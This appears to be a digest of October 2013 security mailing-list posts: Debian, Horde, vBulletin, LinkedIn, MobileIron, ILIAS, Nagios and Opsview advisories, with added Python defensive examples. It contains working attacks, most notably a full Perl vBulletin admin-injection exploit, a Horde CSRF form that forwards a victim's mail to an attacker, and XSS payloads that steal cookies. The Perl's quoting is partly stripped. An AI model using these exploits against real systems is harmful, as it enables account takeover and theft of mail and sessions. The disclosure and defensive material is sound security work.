For the oldstable distribution (squeeze), these problems have been fixed
in version 4.4.1-8+squeeze2.

For the stable distribution (wheezy), which is only affected by
CVE-2013-2924, this problem has been fixed in version 4.8.1.1-12+deb7u1.

For the testing distribution (jessie), which is only affected by
CVE-2013-2924, this problem will be fixed soon.

For the unstable distribution (sid), which is only affected by
CVE-2013-2924, this problem has been fixed in version 4.8.1.1-13+nmu1.

We recommend that you upgrade your icu packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.15 (GNU/Linux)

iQQcBAEBCgAGBQJSbYO5AAoJELjWss0C1vRzCO0f/2f0LJGu/BNl9fTFUAcG75j+
MmY927JqeOgQxbglH5CK/Rj8m+FCKE9D9Ak8ac4odA3R6AlIja4sQWHuiXJFTxP8
ZEJSmfrSS/dcolts3rBRxQOomQcIy6HrcXllmSn5q6GHjOkyykjRXGkVlfpcU98X
hBrCu4dzgzgIglUC61Esmfd3qiw7R7ZVik+obKniRTgDkxX+piAaTsQpGGKoRoA2
NDwbHil2iIcpQ7o/HYrhxTPLDzgrN0/wsSJpCEYVlIp+WwSk3ZZOqB8/P+lL7lpx
xDhq9HVxyicQsisrNZMSU7lq5GEtHzN5krVEfCCmbjLsosuJWwu7vgS2Dbpm91Z+
AtpTjBSwj1r85+lKy5vsYbETrX6N9EAWV8Pav+NbBzLGCofWdVlFw3aQM49I7geq
ADuV00toYV/XLeEWd/Foz5FuxHU9TKX/gkMkNkqpGCcXQ58PMnKOJMRV6SEB8Sem
sipq9CIbxi60dKQCgn+TkvRfULHNAhlzR4V0MG8Xr4ev26pvWQgoWDAA/kVg6AUr
64Cb+t5mHWllj93/+C34sAnRosNUJBRBTwuW4azL5fczh1YW4FiJ8SZPh8mOG+iA
VoYrQhv/+tUdb5cYtog4QXMLLV0Ai6SM5OioGdZSLSLaMw2Y4mdD3S4WiPZmOZEY
ITihdQzTX1VlqO8nYpE/zTcb9z4CIaFyoENLUe0G6F6aNGYcRsS0ZdX+IFY/KsBC
s2eHaVnF1Vv2CWmi9ml9svunnf4szCbJ8VBsoMhahsfTntuo6pbeVj66I3CUGYuY
Buc6Eoygzsl4MeD0fmYOMEAmMLvcA0Ehp/PJxyXFd/dJoV46cNuWz7HaqNH/5qa6
hDjhUb1SnmuFbh7FuLhr6EhujJiSy9SNVfMGojnThpH2sEFa66PAW+gXi3BkfwV7
jFU52Mc0fIL+ZHsvkWEXuz7Ha5NfCYmG50p9esyKMlAPXJ7EVwfBy02Dqzvyyy1n
g+wAtLtvo7oicjTDsuJ7sGuQGzJaME0zt26Q0OVHA+lJnh/KzcWO2LFoYk/Fpv3N
sjGwi/ge7hJiqcXvzbYGRgTlb6E0z/1e85DePrkha/a8zUCdJFDm8SqRfssqvdE5
QKnM63XvoDdIjO958yQa614D1UQ4f4ey0/iKdXa/NwbackMgPKBCllzkU/B5tVc/
LDeIGK5d355nWCBLt2AZ+V7N+taaKHdjmtpPStdT65QRKuXt2xIIJzJ4jWBc+p0F
Vnh9lqBJDmHd6R3zTQKas25rCQyoB1Lfv74ANouAK1prgfdeEzVawmE+W1h6l6P1
OVAj7tjOrNq0xEli+B2iFMJG/6Q7VC8siCBQdHZYqWfMS21QIQj11PEcQHP7HFA=
=WhFc
-END PGP SIGNATURE-



Multiple CSRF Horde Groupware Webmail Edition 5.1.2

2013-10-28 Thread m . benetrix
#
Exploit Title: Multiple CSRF Horde Groupware Webmail Edition
Author: Marcela Benetrix
Date: 10/25/13
Version: 5.1.2
Software link: http://www.horde.org/apps/webmail

#
Groupware Webmail Edition

Horde Groupware Webmail Edition is a free, enterprise ready, browser based 
communication suite. Users can read, send and organize email messages and 
manage and share calendars, contacts, tasks, notes, files, and bookmarks with 
the standards compliant components from the Horde Project

##
CSRF Location

Several functions in the Rules section were found to lack the anti-CSRF 
token that would prevent cross-site request forgery.


##
POC

<html>
  <body>
    <form action="./horde/ingo/basic.php?page=rule" method="POST">
      <input type="hidden" name="actionID" value="rule_save" />
      <input type="hidden" name="conditionnumber" value="-1" />
      <input type="hidden" name="name" value="TestingCSRF" />
      <input type="hidden" name="combine" value="1" />
      <input type="hidden" name="field[0]" value="From" />
      <input type="hidden" name="match[0]" value="contains" />
      <input type="hidden" name="value[0]" value="test@hotmail.com" />
      <input type="hidden" name="field[1]" value="" />
      <input type="hidden" name="action" value="4" />
      <input type="hidden" name="actionvalue" value="attacker@hotmail.com" />
      <input type="hidden" name="stop" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

These were found at:
  * Creating a rule
  * Updating a rule
  * Enabling a rule
    (http://www.test.com/horde/ingo/basic.php?page=filters&rulenumber=2&actionID=rule_enable)
  * Deleting a rule (URL-based:
    https://www.test.com/horde/ingo/basic.php?page=filters&rulenumber=6&actionID=rule_delete)

###
CVE identifier

CVE-2013-6275.
##
Vendor Notification
10/25/2013: Reported to the developers. They replied immediately and fixed the problem 
with a patch: http://bugs.horde.org/ticket/12796
10/28/2013: Disclosure
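The PoC form works because the rule_save handler accepts any POST that carries the right field names, whether or not the user meant to send it. The following is an added example, not Horde's code: a minimal synchronizer-token scheme in Python, with the token bound to the session and to the specific actionID, and a handler for rule_save plus one for the GET-based rule_enable/rule_delete URLs from the advisory. The secret, session identifiers and the form dictionary are constructed for the example (the form field set mirrors the PoC above).

```python
import hashlib
import hmac

# Hypothetical server-side secret; in a deployment it lives in server config and
# the session id comes from the authenticated session cookie.
SERVER_SECRET = b"constructed-secret-do-not-reuse"


def issue_csrf_token(session_id, action, secret=SERVER_SECRET):
    """Synchronizer token bound to the session and to one action, so a token
    leaked for one action cannot be replayed against another."""
    msg = ("%s:%s" % (session_id, action)).encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def token_is_valid(session_id, action, token, secret=SERVER_SECRET):
    if not token:
        return False
    expected = issue_csrf_token(session_id, action, secret)
    return hmac.compare_digest(expected, token)  # constant-time comparison


def handle_rule_save(session_id, form):
    """POST handler for actionID=rule_save. A forged cross-site form cannot
    include a token for the victim's session, so it is rejected before any
    state changes."""
    if form.get("actionID") != "rule_save":
        return ("rejected", "unexpected actionID")
    if not token_is_valid(session_id, "rule_save", form.get("csrf_token")):
        return ("rejected", "missing or invalid CSRF token")
    rule = {
        "name": form.get("name"),
        "field": form.get("field[0]"),
        "match": form.get("match[0]"),
        "value": form.get("value[0]"),
        "action": form.get("action"),
        "actionvalue": form.get("actionvalue"),
    }
    return ("ok", rule)


def handle_filter_get(session_id, query):
    """The advisory's rule_enable / rule_delete links change state over GET;
    they need the same token (and ideally a switch to POST)."""
    action = query.get("actionID")
    if action not in ("rule_enable", "rule_delete"):
        return ("rejected", "unknown actionID")
    if not token_is_valid(session_id, action, query.get("csrf_token")):
        return ("rejected", "missing or invalid CSRF token")
    return ("ok", {"action": action, "rulenumber": query.get("rulenumber")})


# Field set from the advisory's PoC form (constructed values).
FORGED_FORM = {
    "actionID": "rule_save", "conditionnumber": "-1", "name": "TestingCSRF",
    "combine": "1", "field[0]": "From", "match[0]": "contains",
    "value[0]": "test@hotmail.com", "field[1]": "", "action": "4",
    "actionvalue": "attacker@hotmail.com", "stop": "1",
}

if __name__ == "__main__":
    victim = "sess-victim"
    print(handle_rule_save(victim, FORGED_FORM))
    legit = dict(FORGED_FORM, csrf_token=issue_csrf_token(victim, "rule_save"))
    print(handle_rule_save(victim, legit))
```

The forwarding rule in the PoC (action 4, actionvalue attacker@hotmail.com) is exactly why this matters: a filter rule created by CSRF silently copies the victim's mail to the attacker until someone notices it in the rule list.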




vBulletin remote admin injection exploit

2013-10-28 Thread simo
#!/usr/bin/perl
#
# Title: vBulletin remote admin injection exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 17 September 2013
# Published: 24 October 2013
# MorXploit Research
# http://www.MorXploit.com
# 
# Vendor: vBulletin (www.vbulletin.com)
# Version: 4.1.x / 5.x.x
# Vulnerability: Remote admin injection
# Severity: High
# Status: Confirmed
#
# Exploit code description:
# Perl code to inject a new admin account through upgrade.php script.
#
# Vulnerability details:
# upgrade.php is vulnerable to a new admin account injection; the script 
doesn't require authentication when upgrading,
# it only requires the customer number, which can be extracted from the same 
script's source code.
#
# Fix:
# Rename or delete the install folder until a fix is released.
#
# Author disclaimer:
# The information contained in this entire document is for educational, 
demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use. Use at your own risk.
#
# Exploit usage:
#
# root@MorXploit:/home/simo/morx# perl morxvb.pl localhost
# 
# ===
# --- vbulletin admin injection exploit
# --- By: Simo Ben youssef simo_at_morxploit_com
# --- MorXploit Research www.MorXploit.com
# ===
# [*] Trying to get customer number ... hold on!
# [+] Got !
# [*] Trying to MorXploit localhost ... hold on!
# [+] Admin account successfully injected!
# [+] Admin: MorXploit
# [+] Pass: m0rxpl017

use strict;
use IO::Socket;

if(!defined($ARGV[0])) {

system ('clear');
print \n;
print ===\n;
print --- vbulletin admin injection exploit\n;
print --- By: Simo Ben youssef simo_at_morxploit_com\n;
print --- MorXploit Research www.MorXploit.com\n;
print ===\n;

print --- Usage: perl $0 target\n\n;
exit; }

my $site = $ARGV[0];

# Change these as needed #
my $user = MorXploit;
my $passwd = m0rxpl017;
my $email = dev%40null.com;
my $path = /install/upgrade.php;
##

my $accept = Accept: */*;
my $ct = application/x-www-form-urlencoded;
my $port = 80;

system ('clear');
print \n;
print ===\n;
print --- vbulletin admin injection exploit\n;
print --- By: Simo Ben youssef simo_at_morxploit_com\n;
print --- MorXploit Research www.MorXploit.com\n;
print ===\n;

my $sock = new IO::Socket::INET ( PeerAddr = $site,PeerPort = $port,Proto 
= tcp); die \n[-] Can't creat socket: $!\n unless $sock;

print [*] Trying to get customer number ... hold on!\n;

print $sock GET $path HTTP/1.1\n; 
print $sock Host: $site\n;
print $sock $accept\n;
print $sock Content-Type: $ct\n;
print $sock Connection: Close\n\n;

my $gotcn;
while(my $cn = $sock) {
if ($cn =~ /CUSTNUMBER = \(.*?)\/){
$gotcn = $1;
}
}

if (!defined $gotcn) {
print [-] Failed to get customer number! Nulled? Going to try anyway!\n;
}
else {
print [+] Got $gotcn!\n;
}
my $xploit = 
ajax=1version=installchecktable=falsefirstrun=falsestep=7startat=0only=falsecustomerid=$gotcnoptions[skiptemplatemerge]=0response=yeshtmlsubmit=1htmldata[username]=$userhtmldata[password]=$passwdhtmldata[confirmpassword]=$passwdhtmldata[email]=$email;
my $cl = length($xploit);
my $content = Content-Length: $cl;

my $sock2 = new IO::Socket::INET ( PeerAddr = $site,PeerPort = 
$port,Proto = tcp); die \n[-] Can't creat socket: $!\n unless $sock;

print [*] Trying to MorXploit $site ... hold on!\n;

print $sock2 POST $path HTTP/1.1\n;
print $sock2 Host: $site\n;
print $sock2 $accept\n;
print $sock2 Cookie: bbcustomerid=$gotcn\n;
print $sock2 Content-Length: $cl\n;
print $sock2 Content-Type: $ct\n;
print $sock2 Connection: Close\n\n;
print $sock2 $xploit\n\n;

while(my $result = $sock2){
if ($result =~ /Administrator account created/) {
print [+] Admin account successfully injected!\n;
print [+] Admin: $user\n;
print [+] Pass: $passwd\n;
exit;
}
}
print [-] Failed, something went wrong\n;
exit;


[ISecAuditors Security Advisories] XSS vulnerability in LinkedIn

2013-10-28 Thread ISecAuditors Security Advisories
=
INTERNET SECURITY AUDITORS ALERT 2013-003
- Original release date: March 3rd, 2013
- Last revised: March 10th, 2013
- Discovered by: Vicente Aguilera Diaz
- Severity: 4.3/10 (CVSSv2 Base Score)
=

I. VULNERABILITY
-
XSS vulnerability in LinkedIn.

II. BACKGROUND
-
LinkedIn is a social networking service and website (www.linkedin.com)
for professionals. The site officially launched on May 5, 2003. As of
September 30, 2012 (the end of the third quarter), professionals are
signing up to join LinkedIn at a rate of approximately two new members
per second. Actually, over 200 million professionals use LinkedIn to
exchange information, ideas and opportunities.

More info: http://www.linkedin.com

III. DESCRIPTION
-
Cross-Site Scripting attacks are a type of injection problem, in which
malicious scripts are injected into the otherwise benign and trusted web
sites.

Cross-site scripting (XSS) attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser
side script, to a different end user. Flaws that allow these attacks to
succeed are quite widespread and occur anywhere a web application uses
input from a user in the output it generates without validating or
encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting
user. The end user's browser has no way to know that the script should
not be trusted, and will execute the script. Because it thinks the
script came from a trusted source, the malicious script can access any
cookies, session tokens, or other sensitive information retained by your
browser and used with that site. These scripts can even rewrite the
content of the HTML page.

LinkedIn is vulnerable to XSS attacks during a DWR (Direct Web Remoting,
a Java open source library) call through the c0-id parameter. There
are several instances of this issue:
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreativeText.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.getBidSuggestion.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateClickThroughUrl.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreative.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.getCostAndMemberCount.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateRequiredFields.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateDisplayUrl.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.getExampleAds.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.changeBizAcctName.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.updateAlertMessageId.dwr

IV. PROOF OF CONCEPT
-
Next, we show a typical request to the
/ads/dwr/exec/SasAjax.validateCreative.dwr resource:

POST /ads/dwr/exec/SasAjax.validateCreative.dwr HTTP/1.1
Host: www.linkedin.com
...other-HTTP-headers...

callCount=1
JSESSIONID=0B3F07B2742AF0F5A020AB0FB72123D9
c0-scriptName=SasAjax
c0-methodName=validateCreative
c0-id=5518_1360723319833
c0-param0=string:
c0-param1=string:
c0-param2=string:
c0-param3=string:
c0-param4=string:
c0-param5=string:
c0-param6=string:en_US
c0-param7=string:0
c0-param8=string:0
c0-param9=number:0
xml=true

Some parameters are not used/validated by the application, so we can
remove these parameters from the request. The only parameters that are
required by the application are:
- callCount
- JSESSIONID == can have any value, but must match the JSESSIONID cookie
- c0-id == vulnerable parameter (we can inject HTML/script code through
this parameter)
- xml == we need to change the value from true (default value) to
false to make the script code injection possible

Also, we can use the HTTP GET method instead of the HTTP POST method used
in this request. This makes the exploitation of the XSS vulnerability
easier.

For example, we can inject script code to show an alert popup with the
document.cookie value:
c0-id=5518_1360723319833');</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT><!--

So, finally, this HTTP request provokes the XSS exploitation:

https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreative.dwr?callCount=1&JSESSIONID=0B3F07B2742AF0F5A020AB0FB72123D9&c0-id=5578_1362323397833');</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT><!--&xml=false

V. BUSINESS IMPACT
-
A malicious user can access the information stored in the cookies of
other users, so the attacker can spoof their identity and access these
user accounts.

VI. SYSTEMS AFFECTED
-
http://www.linkedin.com

VII. SOLUTION
-
Pending.

VIII. REFERENCES
-
http://www.linkedin.com
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

IX. CREDITS
-
This vulnerability has been discovered and reported by
Vicente Aguilera Diaz, vaguilera (at) isecauditors (dot) 

[scip_Advisory 10847] MobileIron 4.5.4 Device Registration regpin Cross Site Scripting

2013-10-28 Thread Marc Ruef
MobileIron 4.5.4 Device Registration regpin Cross Site Scripting

scip AG Vulnerability ID 10847 (10/28/2013)
http://www.scip.ch/en/?vuldb.10847

I. INTRODUCTION

MobileIron is a commercial solution to provide secure access to mobile users in 
corporate environments.

More information is available on the official web site at the following URL:

http://www.mobileiron.com/

II. DESCRIPTION

Pascal Schaufelberger at scip AG found a cross site scripting vulnerability in 
the older release 4.5.4.

An attacker is able to inject arbitrary script code without former 
authentication.

III. SCORING

CVSSv2 Base Score: 7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSSv2 Temp Score: 5.9 (CVSS2#E:POC/RL:OF/RC:C)

IV. EXPLOITATION

The attack requires access to the device registration form. The attack attempt 
can be initiated with the following url:

https://www.example.com/mifs/c/i/reg/reg.html?regpin=12345;<script>alert('scip')</script>

V. IMPACT

This is a traditional reflected cross site scripting vulnerability, which 
allows the injection of arbitrary script code. An attacker might be able to 
alter the behavior of the web site and might therefore attack visitors.

VI. DETECTION

Cross site scripting pattern in the regpin field should be detected and 
eliminated. Most security solutions provide this function out of the box.

VII. SOLUTION

This issue got fixed in release 5.1.0 without further notification. Current 
release is 5.8, which has been available since October 2013.

VIII. VENDOR RESPONSE

The issue has been reported to the vendor via email. The communication was very 
efficient and friendly.

After exchange of technical details the vendor informed that this issue was 
known already and has been patched without further notice.

IX. SOURCES

scip AG - Security is our Business
http://www.scip.ch

scip AG - Vulnerability Database
http://www.scip.ch/en/?vuldb.10847

X. DISCLOSURE TIMELINE

2013/09/28 Identification of the vulnerability
2013/10/14 First contact to MobileIron via Twitter
2013/10/15 Got mail address of MobileIron security contact
2013/10/16 Initial confirmation of our submission by MobileIron
2013/10/18 Detailed description of further actions by MobileIron
2013/10/18 Confirmation of next steps by scip AG
2013/10/28 Public disclosure of the advisory

XI. CREDITS

The vulnerability has been discovered by Pascal Schaufelberger.

Pascal Schaufelberger, scip AG, Zuerich, Switzerland
pasc-at-scip.ch
http://www.scip.ch

The disclosure process has been handled by Marc Ruef.

Marc Ruef, scip AG, Zuerich, Switzerland
maru-at-scip.ch
http://www.scip.ch

A1. LEGAL NOTICES

Copyright (c) 2002-2013 scip AG, Switzerland.

Permission is granted for the re-distribution of this alert. It may not
be edited in any way without permission of scip AG.

The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. There are no
warranties with regard to this information. Neither the author nor the
publisher accepts any liability for any direct, indirect or
consequential loss or damage from use of or reliance on this advisory.


[PT-2013-46] Local File Include in Nagios Looking Glass

2013-10-28 Thread noreply
---
  (PT-2013-46) Positive Technologies Security Advisory 
  Local File Include in Nagios Looking Glass
---

---[ Vulnerable software ]

Nagios Looking Glass 
Version: 1.1.0 beta 2 and earlier

Link: 
http://exchange.nagios.org/directory/Addons/Frontends-(GUIs-and-CLIs)/Web-Interfaces/Nagios-Looking-Glass/details

---[ Severity level ]

Severity level: High 
Impact: Files Reading 
Access Vector:  Remote 
CVSS v2: 
Base Score: 7.8 
Vector: (AV:N/AC:L/Au:N/C:C/I:N/A:N)

CVE: not assigned

---[ Software description ]

Nagios Looking Glass (NLG) is a web-based interface for Nagios that allows you 
to show at-a-glance, real-time server status to 3rd parties without giving them 
direct access to Nagios.

---[ Vulnerability description ]

The specialists of the Positive Research center have detected a Local File 
Include vulnerability in Nagios Looking Glass.

The application doesn't validate input data, which allows attackers to read 
configuration files. To exploit this vulnerability a remote attacker does not 
need privileges in Nagios Looking Glass. 
Vulnerability exists in server/s3_download.php.

---[ How to fix ]

No solution

---[ Advisory status ]

19.07.2013 - Vendor gets vulnerability details 
13.08.2013 - Vulnerability details were sent to CERT 
28.10.2013 - Public disclosure

---[ Credits ]

The vulnerability was detected by Vyacheslav Egoshin, Positive Research Center 
(Positive Technologies Company)

---[ References ]

http://en.securitylab.ru/lab/PT-2013-46 
Reports on the vulnerabilities previously discovered by Positive Research:

http://www.ptsecurity.com/research/advisory/ 
http://en.securitylab.ru/lab/
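The advisory names the affected script but gives no code, so here is an added Python example (not Nagios Looking Glass's own code; the download directory, file names and request strings are constructed) of the check a file-download endpoint needs: resolve the requested name inside the directory it is meant to serve and refuse anything whose real path lands outside it, covering `..` segments, absolute paths and a symlink planted inside the directory.

```python
import os
import tempfile


class UnsafePathError(ValueError):
    """Raised when a requested file would resolve outside the served directory."""


def safe_join(base_dir: str, requested: str) -> str:
    """Return the real path of `requested` inside `base_dir`, or raise.

    realpath() collapses '.' and '..' and follows symlinks, so the decision is
    made on where the file actually lives, not on how the name was spelled."""
    base = os.path.realpath(base_dir)
    if "\x00" in requested:
        raise UnsafePathError("NUL byte in requested name")
    if os.path.isabs(requested):
        raise UnsafePathError("absolute paths are not allowed")
    candidate = os.path.realpath(os.path.join(base, requested))
    if candidate != base and not candidate.startswith(base + os.sep):
        raise UnsafePathError(f"{requested!r} resolves outside {base_dir!r}")
    return candidate


def read_download(base_dir: str, requested: str) -> bytes:
    """The hardened read: open only what safe_join() accepted."""
    with open(safe_join(base_dir, requested), "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Build a constructed layout and return what each request yields.

    <tmp>/downloads/report.txt   the only file meant to be downloadable
    <tmp>/config.php             a sibling file that must stay unreachable
    <tmp>/downloads/leak         a symlink to config.php planted inside downloads"""
    with tempfile.TemporaryDirectory() as tmp:
        downloads = os.path.join(tmp, "downloads")
        os.mkdir(downloads)
        with open(os.path.join(downloads, "report.txt"), "wb") as fh:
            fh.write(b"status report")
        with open(os.path.join(tmp, "config.php"), "wb") as fh:
            fh.write(b"<?php $db_password = 'constructed';")
        os.symlink(os.path.join(tmp, "config.php"), os.path.join(downloads, "leak"))

        results = {}
        for req in ("report.txt", "sub/../report.txt", "../config.php",
                    "/etc/hostname", "leak", "missing.txt"):
            try:
                results[req] = read_download(downloads, req)
            except (UnsafePathError, FileNotFoundError) as exc:
                results[req] = type(exc).__name__
        return results


if __name__ == "__main__":
    for req, outcome in demo().items():
        print(f"{req:20} -> {outcome!r}")
```

Note that `sub/../report.txt` is accepted: it resolves to a file inside the directory, so rejecting it would only be a blacklist on the spelling of the name. The check is on the resolved location, which is what protects the configuration file regardless of how the request is encoded.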


Re: Call for Papers, 2014 Symposium on Protocols and Rules for Security (SPRS2014)

2013-10-28 Thread Brandon Butterworth
  td style=PADDING-BOTTOM: 5px; LINE-HEIGHT: 22px;
  PADDING-LEFT: 5px; PADDING-RIGHT: 5px; FONT-FAMILY: Times New
  Roman; COLOR: #2b2b2b; FONT-SIZE: 19px; PADDING-TOP: 5px
  align=leftp style=line-height:23px;font-size:20px;Dear
  Colleagues,/p pWe would like to cordially invite you to
  submit or recommend papers to 2014 Symposium on Protocols and
  Rules for Security (SPRS2014)!

May I suggest

rule 1. Don't send html only email

to enable

rule 2. Don't render html email unless you're sure it's what it claims
to be and you are sure it is safe. Actually just don't, you know
someone in your organisation will get phished, putting others at risk.
Just strip the html at your MTA, you can do this because of rule 1.

regards
brandon


ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability

2013-10-28 Thread Vulnerability Lab
Document Title:
===
ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1122


Release Date:
=
2013-10-27


Vulnerability Laboratory ID (VL-ID):

1122


Common Vulnerability Scoring System:

3.9


Product & Service Introduction:
===
ILIAS is a web-based learning management system (LMS, VLE). Features: Courses, 
SCORM 1.2 and 2004, mail, forum, chat, groups, 
podcast, file sharing, authoring, CMS, test, wiki, personal desktop, LOM, LDAP, 
role based access.

(Copy of the Homepage: http://sourceforge.net/projects/ilias/ )



Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities 
in the ILIAS eLearning v4.3.4 & v4.4 CMS web-application.


Vulnerability Disclosure Timeline:
==
2013-10-27:Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

ILIAS
Product: ILIAS eLearning - Content Management System 4.3.4 & 4.4 


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A persistent input validation web vulnerability is detected in the ILIAS 
eLearning v4.3.4 & v4.4 CMS web-application.
The bug allows a (remote) attacker to inject their own malicious persistent 
script code (application side).

The persistent web vulnerability is located in the `Notes & Comments` module. 
Remote attackers are able to inject their own 
malicious script code via a POST method request in the vulnerable comment or note 
parameters. The execution occurs in 
the comments and private notes modules of the admin panel.

Exploitation of the persistent web vulnerability requires low user interaction 
and a low privileged web-application user account.
Successful exploitation of the vulnerability can lead to persistent session 
hijacking (customers), account theft via persistent 
web attacks, persistent phishing or persistent module context manipulation.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Notes
[+] Comments

Vulnerable Parameter(s):
[+] note

Affected Module(s):
[+] Private Notes
[+] Comments Review


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by remote 
attackers with low user interaction and low privileged 
web-application user account. For demonstration or to reproduce ...

PoC: Public Comments & private Notes

<div class="ilNote">
<a name="note_35"><!-- <img src="./templates/default/images/note_unlabeled.png" 
alt="Note" 
title="Note" border="0" style="vertical-align:text-bottom; 
margin-bottom:2px;"/> --></a>
<span class="small light">   Last edited on 26. Oct 2013</span>
<div class="ilNoteText"><h4 class="ilNoteTitle"></h4>%20%20[PERSISTENT 
INJECTED SCRIPT CODE!]
</div></div>


--- PoC Session Logs ---
Status: 302[Found]
POST http://ilias.localhost:8080/ilias.php?note_type=1&cmd=post&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI&fallbackCmd=getNotesHTML&rtoken=2d302c4c574f61fc880f393433703e1b
 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[20] 
Mime Type[text/html]
   
Request Headers:
Host[ilias.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 
Firefox/24.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://ilias.localhost:8080/ilias.php?note_type=1&note_id=35&cmd=editNoteForm&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI]
Cookie[ilClientId=demo; PHPSESSID=mgvf9np8j9394rr0jdjg6kcqb2; iltest=cookie; 
authchallenge=459071aa3327de70506cb2a465507bf5]
Connection[keep-alive]
   

Post Data:
note[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvulnerability-lab.com%2F%3E%40gmail.com%0D%0A%3E
%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cdiv+style%3D%221%40gmail.com%0D%0A%3E%22%3Cscript%3Ealert%28
document.cookie%29%3C%2Fscript%3E%40gmail.com]
cmd%5BupdateNote%5D[Update+Note]
note_id[35]
   

Response Headers:
Date[Sat, 26 Oct 2013 21:12:44 GMT]
Server[Apache/2.2.22 (Ubuntu)]
X-Powered-By[PHP/5.3.10-1ubuntu3.8]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Location[http://ilias.localhost:8080/ilias.php?note_mess=mod&cmd=showNotes&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI#notes_top]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[20]
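This advisory and the LinkedIn DWR one earlier in this digest come down to the same defect: untrusted text written into a page without encoding for the context it lands in. The Python below is an added example (mine, not code from ILIAS or LinkedIn; the note and call-id payloads are constructed to resemble the two PoCs, and the render functions are hypothetical stand-ins) showing the two encodings involved: HTML-entity escaping for a stored note rendered into the document body, and JSON-plus-angle-bracket escaping for an id echoed into a JavaScript string inside a script element, where a literal `</script>` in the data would end the script before any JavaScript-level escaping matters.

```python
import html
import json

# Constructed payloads shaped like the two PoCs (not the advisories' exact strings).
NOTE_PAYLOAD = '"><script>alert(document.cookie)</script>'
DWR_ID_PAYLOAD = "5518_1360723319833');</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT><!--"


def escape_for_html_body(text: str) -> str:
    """HTML element or attribute context: &, <, >, " and ' become entities."""
    return html.escape(text, quote=True)


def escape_for_js_string(value: str) -> str:
    """JavaScript string-literal context inside a <script> element.

    json.dumps() takes care of quotes, backslashes, control characters and
    (with its default ensure_ascii) non-ASCII, but the HTML tokenizer runs
    before the JavaScript engine and ends the script at a literal '</script>'
    or opens a comment at '<!--'. Encoding <, > and & as \\uXXXX keeps them out
    of the markup while the JS engine still decodes them to the same string."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def js_literal_round_trips(value: str) -> bool:
    """The escaped literal must still decode to exactly the original value."""
    return json.loads(escape_for_js_string(value)) == value


def render_note(note_text: str) -> str:
    """Hypothetical stand-in for rendering a stored note into the page body."""
    return f'<div class="ilNoteText">{escape_for_html_body(note_text)}</div>'


def render_script_reply(call_id: str) -> str:
    """Hypothetical stand-in for a script reply that echoes the caller's id."""
    return f"<script>handleCallback({escape_for_js_string(call_id)});</script>"


def script_element_count(rendered: str) -> int:
    """Number of <script ...> start tags the HTML tokenizer would see."""
    return rendered.lower().count("<script")


if __name__ == "__main__":
    print(render_note(NOTE_PAYLOAD))
    print(render_script_reply(DWR_ID_PAYLOAD))
```

The point of `script_element_count` is that the rendered reply contains exactly the one script element the template put there; the injected `</SCRIPT><SCRIPT>` in the id never becomes markup because no `<` survives in the literal.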

CVE-2013-5695 Multiple Cross Site Scripting (XSS) Attacks in Ops View

2013-10-28 Thread J. Oquendo
CVE-2013-5695 Multiple Cross Site Scripting (XSS) Attacks in Ops View
Version(s): Opsview pre 4.4.1
Author: J. Oquendo (joquendo at e-fensive dot net)


I. ADVISORY

Title: Multiple Cross Site Scripting (XSS) Attacks in Ops View
Date published: 2013-10-28
Vendor contacted: 2013-09-04


II. BACKGROUND

Opsview is a systems management software built on open
source software. To minimize noise, read more about it
here

http://www.opsview.com/about-us


II. DESCRIPTION

Opsview is vulnerable to a few different XSS based attacks.

